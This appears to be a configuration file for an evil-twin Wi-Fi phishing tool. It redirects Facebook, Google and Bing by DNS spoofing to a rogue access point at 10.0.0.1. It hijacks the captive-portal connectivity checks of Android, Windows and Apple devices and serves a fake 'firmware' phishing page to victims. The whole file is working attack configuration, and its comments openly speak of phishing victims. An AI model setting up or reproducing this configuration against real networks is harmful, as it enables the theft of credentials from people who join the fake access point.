[Redirect]
;configuration for redirect on evil twin and dnsspoof
; facebook will redirect -> 192.168.1.1
facebook.com=10.0.0.1
; google will redirect -> 10.0.0.1 
google.com=10.0.0.1
; bing will redirect -> 10.0.0.1
bing.com=10.0.0.1

[more]
;change "on" to "off" for turning
captive_portal=on
; captive portal wifi phising for android
[captive_portal]
clients3.google.com=10.0.0.1
connectivitycheck.android.com=10.0.0.1
connectivitycheck.gstatic.com=10.0.0.1
; captive portal wifi phishing for windows
www.msftconnecttest.com=10.0.0.1
;captive portal wifi phihing for apple
www.appleiphonecell.com=10.0.0.1
captive.apple.com=10.0.0.1
www.apple.com=10.0.0.1
.apple.com.edgekey.net=10.0.0.1

[Server]
;configuration for address of phishing page
; default port for http
port=80

[phishing_page]
; path for custom phishing page
; you can custom path with your own script
; and sorry because this web server not support image ,please understand :)

;path for home page
index_path=phishing-page/firmware/index.html
;this is file for giving your response for victim
response_path=phishing-page/firmware/response.html 

[dhcp]
; router gateway (IP for your accesspoint)
; if you change this ip you must change ip on captive portal & redirect
ip=10.0.0.1